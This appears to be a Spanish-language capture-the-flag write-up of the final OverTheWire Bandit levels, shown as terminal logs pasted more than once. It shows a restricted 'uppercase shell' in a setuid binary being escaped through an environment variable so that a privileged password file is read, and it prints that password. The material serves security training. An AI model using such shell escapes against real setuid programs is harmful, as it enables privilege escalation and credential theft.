c9c3199ddf4121b10cf581a98d51caee
- bandit32@bandit:~$ ls
- uppershell
- bandit32@bandit:~$ ll
- total 28
- drwxr-xr-x 2 root root 4096 Jul 22 18:59 ./
- drwxr-xr-x 42 root root 4096 Jul 22 18:42 ../
- -rw-r--r-- 1 root root 220 Sep 1 2015 .bash_logout
- -rw-r--r-- 1 root root 3771 Sep 1 2015 .bashrc
- -rw-r--r-- 1 root root 655 Jun 24 2016 .profile
- -rwsr-x--- 1 bandit33 bandit32 7668 Jul 22 18:59 uppershell*
- bandit32@bandit:~$ file uppershell
- uppershell: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=cdff8f7c7d0798f2f0b06721115c5dce7db6ed1e, not stripped
- bandit32@bandit:~$ ./uppershell
- WELCOME TO THE UPPERCASE SHELL
- >> cat /etc/bandit_pass/bandit33
- sh: 1: CAT: not found
- bandit32@bandit:~$ ls
- uppershell
- bandit32@bandit:~$ COMMAND="cat /etc/bandit_pass/bandit33" ./uppershell
- WELCOME TO THE UPPERCASE SHELL
- >> $COMMAND
- c9c3199ddf4121b10cf581a98d51caee
bandit32@bandit:~$ ls
uppershell
bandit32@bandit:~$ ll
total 28
drwxr-xr-x 2 root root 4096 Jul 22 18:59 ./
drwxr-xr-x 42 root root 4096 Jul 22 18:42 ../
-rw-r--r-- 1 root root 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 root root 3771 Sep 1 2015 .bashrc
-rw-r--r-- 1 root root 655 Jun 24 2016 .profile
-rwsr-x--- 1 bandit33 bandit32 7668 Jul 22 18:59 uppershell*
bandit32@bandit:~$ file uppershell
uppershell: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=cdff8f7c7d0798f2f0b06721115c5dce7db6ed1e, not stripped
bandit32@bandit:~$ ./uppershell
WELCOME TO THE UPPERCASE SHELL
>> cat /etc/bandit_pass/bandit33
sh: 1: CAT: not found
bandit32@bandit:~$ ls
uppershell
bandit32@bandit:~$ COMMAND="cat /etc/bandit_pass/bandit33" ./uppershell
WELCOME TO THE UPPERCASE SHELL
>> $COMMAND
c9c3199ddf4121b10cf581a98d51caee
Nivel 33 -> Nivel 34
Llegados a este nivel hemos terminado todos los retos de bandit!
bandit33@bandit:~$ ls
README.txt
bandit33@bandit:~$ cat README.txt
Congratulations on solving the last level of this game!
At this moment, there are no more levels to play in this game. However, we are constantly working
on new levels and will most likely expand this game with more levels soon.
Keep an eye out for an announcement on our usual communication channels!
In the meantime, you could play some of our other wargames.
If you have an idea for an awesome new level, please let us know!
- bandit33@bandit:~$ ls
- README.txt
- bandit33@bandit:~$ cat README.txt
- Congratulations on solving the last level of this game!
- At this moment, there are no more levels to play in this game. However, we are constantly working
- on new levels and will most likely expand this game with more levels soon.
- Keep an eye out for an announcement on our usual communication channels!
- In the meantime, you could play some of our other wargames.
- If you have an idea for an awesome new level, please let us know!
bandit33@bandit:~$ ls
README.txt
bandit33@bandit:~$ cat README.txt
Congratulations on solving the last level of this game!
At this moment, there are no more levels to play in this game. However, we are constantly working
on new levels and will most likely expand this game with more levels soon.
Keep an eye out for an announcement on our usual communication channels!
In the meantime, you could play some of our other wargames.
If you have an idea for an awesome new level, please let us know!
by 
